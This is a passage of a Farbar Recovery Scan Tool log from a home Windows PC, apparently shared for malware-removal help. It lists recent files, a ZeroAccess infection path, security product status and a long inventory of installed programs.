2014-10-19 03:18 - 2012-04-23 21:54 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-17 22:43 - 2009-12-15 23:07 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-10-17 22:37 - 2009-12-15 23:07 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy
2014-10-17 19:47 - 2012-05-31 22:39 - 00000000 ____D () C:\Users\JP\AppData\Roaming\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-10-17 19:47 - 2009-12-15 21:35 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-10-17 00:29 - 2013-01-21 01:54 - 00000000 ____D () C:\Windows\Minidump
2014-10-08 02:44 - 2010-03-05 23:29 - 00000049 _____ () C:\Windows\NeroDigital.ini
2014-10-04 22:22 - 2012-05-31 22:54 - 00000000 ____D () C:\Users\JP\Documents\Vegas Movie Studio PE 9.0 Projects
2014-10-04 14:52 - 2014-01-14 17:49 - 00000000 ____D () C:\Program Files (x86)\DAP
2014-10-04 14:51 - 2014-01-14 17:49 - 00000000 ____D () C:\ProgramData\SpeedBit
2014-10-04 14:51 - 2012-05-30 22:39 - 00000000 ___RD () C:\Users\JP\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
2014-09-26 14:50 - 2012-11-18 15:51 - 00003168 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForJP
2014-09-26 14:50 - 2012-11-18 15:51 - 00000320 _____ () C:\Windows\Tasks\HPCeeScheduleForJP.job
2014-09-24 03:36 - 2012-04-23 21:54 - 00701104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2014-09-24 03:36 - 2012-04-23 21:54 - 00003768 _____ () C:\Windows\System32\Tasks\Adobe Flash Player Updater
2014-09-24 03:36 - 2011-05-21 10:17 - 00071344 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl

ZeroAccess:
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}
C:\Users\JP\AppData\Local\{f74e7a95-1d32-0366-baea-5ce012d107ec}\@

Some content of TEMP:
====================
C:\Users\JP\AppData\Local\Temp\cabex.dll
C:\Users\JP\AppData\Local\Temp\VARemove.exe
C:\Users\JP\AppData\Local\Temp\VAUninstall.exe
C:\Users\JR\AppData\Local\Temp\dllnt_dump.dll

==================== Bamital & volsnap Check =================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\System32\winlogon.exe => File is digitally signed
C:\Windows\System32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\System32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\System32\services.exe => File is digitally signed
C:\Windows\System32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\System32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\System32\rpcss.dll => File is digitally signed
C:\Windows\System32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2014-10-16 19:00

==================== End Of Log ============================


Additional scan result of Farbar Recovery Scan Tool (x64) Version: 16-10-2014
Ran by JP at 2014-10-20 09:10:19
Running from E:\
Boot Mode: Normal
==========================================================

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: AVG AntiVirus 2013 (Disabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Enabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus 2013 (Disabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}

==================== Installed Programs ======================

(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

 Sansa Media Converter (HKLM-x32\...\{FC053571-8507-44E4-8B6D-AACEAB8CA57C}) (Version: 1.0-B4.263 - )
 Update for Microsoft Office 2007 (KB2508958) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
57xx SteelVine (HKLM-x32\...\{2B25D1AE-F095-47C9-BDCC-80F998E0E17F}) (Version: 5.1.20 - Silicon Image)
7-Zip 4.65 (x64 edition) (HKLM\...\{23170F69-40C1-2702-0465-000001000000}) (Version: 4.65.00.0 - Igor Pavlov)
Acrobat.com (HKLM-x32\...\com.adobe.mauby.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 2.0.0.0 - Adobe Systems Incorporated)
Acrobat.com (x32 Version: 2.0.0 - Adobe Systems Incorporated) Hidden
Activate Norton Online Backup (HKLM-x32\...\{C57BCDE1-7CB9-467D-B3BA-7E119916CDC1}) (Version: 1.1.20.0 - Symantec)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 2.6.0.19140 - Adobe Systems Incorporated)
Adobe AIR (x32 Version: 2.6.0.19140 - Adobe Systems Incorporated) Hidden
Adobe Community Help (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 3.5.23 - Adobe Systems Incorporated.)
Adobe Community Help (x32 Version: 3.5.23 - Adobe Systems Incorporated.) Hidden
Adobe Flash Player 15 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 15.0.0.167 - Adobe Systems Incorporated)
Adobe Photoshop Elements 10 (HKLM-x32\...\Adobe Photoshop Elements 10) (Version: 10.0 - Adobe Systems Incorporated)
Adobe Photoshop Elements 10 (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
Adobe Photoshop.com Inspiration Browser (HKLM-x32\...\PhotoshopdotcomInspirationBrowser.4C35C4D325D350FE0114230CBADCA2DDD0AC8D25.1) (Version: 3.07 - Adobe Systems Incorporated)
Adobe Photoshop.com Inspiration Browser (x32 Version: 3.07 - Adobe Systems Incorporated) Hidden
Adobe Reader XI (11.0.03) (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
AMD Accelerated Video Transcoding (Version: 2.00.0002 - Advanced Micro Devices, Inc.) Hidden
AMD Catalyst Install Manager (HKLM\...\{20384EBF-4F10-13F0-07C6-7A6C87FD83DF}) (Version: 8.0.903.0 - Advanced Micro Devices, Inc.)
AMD Catalyst Install Manager (HKLM\...\{C8807716-1F6F-5C43-3C32-7295A45CF060}) (Version: 8.0.911.0 - Advanced Micro Devices, Inc.)
AMD Drag and Drop Transcoding (Version: 2.00.0000 - Advanced Micro Devices, Inc.) Hidden
AMD Media Foundation Decoders (Version: 1.0.70405.2224 - Advanced Micro Devices, Inc.) Hidden
Any Video Converter 5.6.3 (HKLM-x32\...\Any Video Converter_is1) (Version:  - Any-Video-Converter.com)
Apple Application Support (HKLM-x32\...\{3FA365DF-2D68-45ED-8F83-8C8A33E65143}) (Version: 1.1.0 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{6956856F-B6B3-4BE0-BA0B-8F495BE32033}) (Version: 2.1.1.116 - Apple Inc.)
AutoUpdate (HKLM-x32\...\{18D10072035C4515918F7E37EAFAACFC}) (Version: 1.0 - )
AVG 2013 (HKLM\...\AVG) (Version: 2013.0.3485 - AVG Technologies)
AVG 2013 (Version: 13.0.3485 - AVG Technologies) Hidden
AVG 2013 (Version: 13.0.4031 - AVG Technologies) Hidden
BC_VUP3 (HKLM-x32\...\{DD15A07D-C205-4948-BF90-6D3DD05CEA31}) (Version: 3.0.1 - Uniden)
BlackBerry Desktop Software 6.1 (HKLM-x32\...\BlackBerry_Desktop) (Version: 6.1.0.36 - Research In Motion Ltd.)
BlackBerry Desktop Software 6.1 (x32 Version: 6.1.0.36 - Research In Motion Ltd.) Hidden
Canon Easy-PhotoPrint EX (HKLM-x32\...\Easy-PhotoPrint EX) (Version:  - )
Canon Easy-PhotoPrint Pro - Pro9000 series Extention Data (HKLM-x32\...\Canon Easy-PhotoPrint Pro - Pro9000 series Extention Data) (Version:  - )
Canon Easy-PhotoPrint Pro - Pro9500 series Extention Data (HKLM-x32\...\Canon Easy-PhotoPrint Pro - Pro9500 series Extention Data) (Version:  - )
Canon Easy-PhotoPrint Pro (HKLM-x32\...\Easy-PhotoPrint Pro) (Version:  - )
Canon MG8200 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG8200_series) (Version:  - Canon Inc.)
Canon MG8200 series User Registration (HKLM-x32\...\Canon MG8200 series User Registration) (Version:  - )
Canon MP Navigator EX 5.0 (HKLM-x32\...\MP Navigator EX 5.0) (Version:  - )
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version:  - )
Canon RAW Image Task for ZoomBrowser EX (HKLM-x32\...\RAW Image Task) (Version: 3.3.0.5 - Canon Inc.)
Canon Solution Menu EX (HKLM-x32\...\CanonSolutionMenuEX) (Version:  - )
Canon Utilities CameraWindow (HKLM-x32\...\CameraWindowLauncher) (Version: 7.1.0.2 - Canon Inc.)
Canon Utilities CameraWindow DC_DV 6 for ZoomBrowser EX (HKLM-x32\...\CameraWindowDVC6) (Version: 6.4.2.16 - Canon Inc.)
Canon Utilities Digital Photo Professional 3.4 (HKLM-x32\...\DPP) (Version: 3.4.0.0 - Canon Inc.)
Canon Utilities EOS Utility (HKLM-x32\...\EOS Utility) (Version: 2.4.0.1 - Canon Inc.)
Canon Utilities MyCamera (HKLM-x32\...\MyCamera) (Version: 6.4.0.5 - Canon Inc.)
Canon Utilities PhotoStitch (HKLM-x32\...\PhotoStitch) (Version: 3.1.21.45 - Canon Inc.)
Canon Utilities Picture Style Editor (HKLM-x32\...\Picture Style Editor) (Version: 1.3.0.0 - Canon Inc.)
Canon Utilities RemoteCapture Task for ZoomBrowser EX (HKLM-x32\...\RemoteCaptureTask) (Version: 1.7.1.9 - Canon Inc.)
Canon Utilities WFT-E1/E2/E3 Utility (HKLM-x32\...\WFTK) (Version: 3.2.1.1 - Canon Inc.)
Canon Utilities ZoomBrowser EX (HKLM-x32\...\ZoomBrowser EX) (Version: 6.1.1.21 - Canon Inc.)
Canon ZoomBrowser EX Memory Card Utility (HKLM-x32\...\ZoomBrowser EX Memory Card Utility) (Version: 1.1.0.8 - Canon Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center (x32 Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Graphics Previews Common (x32 Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Standard (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Chinese Traditional (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Czech (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Danish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Dutch (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help English (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Finnish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help French (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help German (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Greek (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Hungarian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Italian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Japanese (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Korean (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Norwegian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Polish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Portuguese (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Russian (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Spanish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Swedish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Thai (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
CCC Help Turkish (x32 Version: 2012.0405.2204.37728 - Advanced Micro Devices, Inc.) Hidden
ccc-utility64 (Version: 2012.0405.2205.37728 - Advanced Micro Devices, Inc.) Hidden
CCleaner (HKLM-x32\...\CCleaner) (Version: 2.35 - Piriform)
Chinese Simplified Fonts Support For Adobe Reader 9 (HKLM-x32\...\{AC76BA86-7AD7-2447-0000-900000000003}) (Version: 9.0.0 - Adobe Systems Incorporated)
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Content Manager (HKLM-x32\...\{B64BC516-2406-43AE-A21A-1E387A2343B1}) (Version: 2.70 - Magellan)
Core Temp version 0.99.7 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 0.99.7 - Arthur Liberman)
Creative 3DMIDI Player (HKLM-x32\...\3DMIDI) (Version: 1.11 - Creative Technology Limited)
Creative ALchemy (HKLM-x32\...\ALchemy) (Version: 1.41 - Creative Technology Limited)
Creative Audio Control Panel (HKLM-x32\...\AudioCS) (Version: 3.00 - Creative Technology Limited)
Creative Console Launcher (HKLM-x32\...\Console Launcher) (Version: 2.61 - Creative Technology Limited)
Creative Diagnostics (HKLM-x32\...\Diagnostics 4_5) (Version: 5.11 - Creative Technology Limited)
Creative Media Toolbox 6 (HKLM-x32\...\{F1A14CB2-A048-45A6-AFDA-3571296E1D76}) (Version: 6.02 - Creative Technology Limited)
Creative Media Toolbox 6 (Shared Components) (HKLM-x32\...\Uninstaller_B4736000_Creative Media Toolbox 6) (Version: 2.80.12 - Creative Labs)
Creative MediaSource 5 (HKLM-x32\...\{BEEFC4F8-2909-48B3-AFAA-55D3533FDEDD}) (Version: 5.26 - Creative Technology Limited)
Creative Software AutoUpdate (HKLM-x32\...\Creative Software AutoUpdate) (Version: 1.40 - Creative Technology Limited)
Creative Sound Blaster Properties x64 Edition (HKLM-x32\...\Creative Sound Blaster Properties x64 Edition) (Version: 1.02 - Creative Technology Limited)
Creative WaveStudio 7 (HKLM-x32\...\WaveStudio 7) (Version: 7.14 - Creative Technology Limited)
DeLorme Street Atlas USA 2008 (HKLM-x32\...\{81D0EAC7-B352-4E71-B8A1-461E41029A2E}) (Version: 1.00.2008 - DeLorme Publishing, Inc.)
Desktop Icon Position Saver (64-bit) (HKLM-x32\...\dips64) (Version:  - )
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
DivX Player (HKLM-x32\...\{8ADFC4160D694100B5B8A22DE9DCABD9}) (Version: 2.5.5 - DivXNetworks, Inc.)
DivX Pro (HKLM-x32\...\{7B63B2922B174135AFC0E1377DD81EC2}) (Version: 5.2.1 - DivXNetworks, Inc.)
Dolby Digital Live Pack (HKLM-x32\...\Dolby Digital Live Pack) (Version: 3.00 - Creative Technology Limited)
Download Accelerator Plus (DAP) (HKLM-x32\...\Download Accelerator Plus (DAP)) (Version: 10060 (Build 2599) - Speedbit Ltd.)
DraftSight (HKLM-x32\...\{A7E24CE8-F9D0-408F-A37C-5BF0716D3E91}) (Version: 8.2.301 - Dassault Systemes)
DTS Connect Pack (HKLM-x32\...\DTS Connect Pack) (Version: 1.00 - Creative Technology Limited)
DVD Decrypter (Remove Only) (HKLM-x32\...\DVD Decrypter) (Version:  - )
DVD Shrink 3.2 (HKLM-x32\...\DVD Shrink_is1) (Version:  - DVD Shrink)
Elements 10 Organizer (x32 Version: 10.0 - Adobe Systems Incorporated) Hidden
FreeRIP v3.5 (HKLM-x32\...\{501451DE-5808-4599-B544-8BD0915B6B24}_is1) (Version: 3.5 - MGShareware)
FreeSCAN  (HKLM-x32\...\FreeSCAN) (Version:  - Sixspot Software)
GSurf_Pro (HKLM-x32\...\GSurf_Pro) (Version: 1.0.0.15 - Grandstream)
Hardware Diagnostic Tools (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5434.08 - PC-Doctor, Inc.)
HijackThis 2.0.2 (HKLM-x32\...\HijackThis) (Version: 2.0.2 - TrendMicro)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.12286.3436 - Hewlett-Packard)
HP Customer Experience Enhancements (x32 Version: 6.0.1.7 - Hewlett-Packard) Hidden
HP Easy Backup (HKLM-x32\...\{67431FA8-4B89-42DD-A68E-30D77F6C8D99}_is1) (Version: 1.0.8.0 - Hewlett-Packard)
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP MediaSmart Demo (HKLM-x32\...\{9DEF9686-CCB2-47B7-BF83-B49EA21FA016}) (Version: 1.00.0000 - Hewlett-Packard)
HP MediaSmart DVD (HKLM-x32\...\InstallShield_{DCCAD079-F92C-44DA-B258-624FC6517A5A}) (Version: 3.0.3420 - Hewlett-Packard)
HP MediaSmart DVD (x32 Version: 3.0.3420 - Hewlett-Packard) Hidden
HP MediaSmart Movie Themes (HKLM-x32\...\InstallShield_{3023EBDA-BF1B-4831-B347-E5018555F26E}) (Version: 3.0.3102 - Hewlett-Packard)
HP MediaSmart Movie Themes (x32 Version: 3.0.3102 - Hewlett-Packard) Hidden
HP MediaSmart Music/Photo/Video (HKLM-x32\...\InstallShield_{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}) (Version: 3.1.3601 - Hewlett-Packard)
HP MediaSmart Music/Photo/Video (x32 Version: 3.1.3601 - Hewlett-Packard) Hidden
HP MediaSmart SmartMenu (HKLM\...\{26280024-DFB7-4967-90DB-7F9C6660D01E}) (Version: 3.0.28.2 - Hewlett-Packard)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Product Detection (HKLM-x32\...\{A436F67F-687E-4736-BD2B-537121A804CF}) (Version: 11.14.0001 - HP)
HP Remote Solution (HKLM-x32\...\HP Remote Solution) (Version: 1.1.9.0 - TopSeed)
HP Remote Solution (x32 Version: 1.1.9.0 - TopSeed) Hidden
HP Setup (HKLM-x32\...\{F3B912F5-EB57-45AA-B3D1-EB532BCF6EF8}) (Version: 1.2.3220.3079 - Hewlett-Packard)
HP Share-to-Web (HKLM-x32\...\{748F4870-8350-11D3-B0BF-080009FB4A19}) (Version:  - )
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{2EFA4E4C-7B5F-48F7-A1C0-1AA882B7A9C3}) (Version: 5.003.001.001 - Hewlett-Packard)
ImgBurn (HKLM-x32\...\ImgBurn) (Version: 2.5.6.0 - LIGHTNING UK!)
Intel® Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
Java 7 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217025FF}) (Version: 7.0.250 - Oracle)
Java Auto Updater (x32 Version: 2.1.9.5 - Sun Microsystems, Inc.) Hidden
Juniper Networks Host Checker (HKCU\...\Neoteris_Host_Checker) (Version: 7.1.0.18193 - Juniper Networks)
Juniper Networks, Inc. Setup Client (HKCU\...\Juniper_Setup_Client) (Version: 7.1.2.10059 - Juniper Networks, Inc.)
Junk Mail filter update (x32 Version: 14.0.8089.726 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.1901 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.1901 - CyberLink Corp.) Hidden
LightScribe Diagnostic Utility (HKLM-x32\...\{7419582C-1E2E-4848-88F6-9FF638D9EA87}) (Version: 1.18.24.1 - LightScribe)
LightScribe System Software (HKLM-x32\...\{2FA75B40-17C9-4D22-88CA-80A5D52FAB13}) (Version: 1.18.24.1 - LightScribe)
LightScribe Template Designs - Life Events Pack 1 (HKLM-x32\...\{5B295E70-5256-46DD-ADA8-81E9EF7F4939}) (Version: 1.17.146.0 - LightScribe)
LightScribe Template Labeler (HKLM-x32\...\{83721450-E604-4C37-ABEB-CE7F18C587C8}) (Version: 1.18.24.1 - LightScribe)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Choice Guard (x32 Version: 2.0.48.0 - Microsoft Corporation) Hidden
Microsoft Live Search Toolbar (HKLM-x32\...\{DF802C05-4660-418c-970C-B988ADB1D316}) (Version: 3.0.560.0 - Microsoft Live Search Toolbar)
Microsoft Live Search Toolbar (x32 Version: 3.0.560.0 - Microsoft Corporation) Hidden
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM-x32\...\{91120000-0030-0000-0000-0000000FF1CE}_ENTERPRISER_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Access database engine 2007 (English) (HKLM-x32\...\{90120000-00D1-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Access MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISER) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM-x32\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 64-bit Components 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Proof (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (x32 Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (x32 Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (x32 Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.20913.0 - Microsoft Corporation)
Microsoft Streets & Trips 2009 (HKLM-x32\...\{C82185E8-C27B-4EF4-2009-4444BC2C2B6D}) (Version: 16.0.18.1000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.30319 (HKLM\...\{DA5E371C-6333-3D8A-93A4-6FD5B20BCC6E}) (Version: 10.0.30319 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MiFi 4620 Mobile Broadband Drivers (HKLM-x32\...\{3A6120C6-AA5F-4851-9447-BF6BDBB786D5}) (Version: 2.08.005.001.17 - Novatel Wireless)
Monster Central Control Software 7 (HKLM-x32\...\{7649309B-F1ED-4225-8B50-1A4224883E55}) (Version: 7.2.0.6 - Monster)
Monster Central Control Software 7 (x32 Version: 7.2.0.6 - Monster) Hidden
MSVCRT (x32 Version: 14.0.1468.721 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MyHarmony (HKCU\...\036a0e4fc6a247ec) (Version: 1.0.1.257 - Logitech)
Nero OEM (HKLM-x32\...\Nero - Burning Rom!UninstallKey) (Version:  - )
NVIDIA Display Control Panel (HKLM\...\NVIDIA Display Control Panel) (Version: 6.14.12.5936 - NVIDIA Corporation)
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.10.62.40 - NVIDIA Corporation)
NVIDIA Performance (HKLM-x32\...\InstallShield_{7C7F30F4-94E7-4AA8-8941-90C4A80C68BF}) (Version: 6.5 - NVIDIA Corporation)
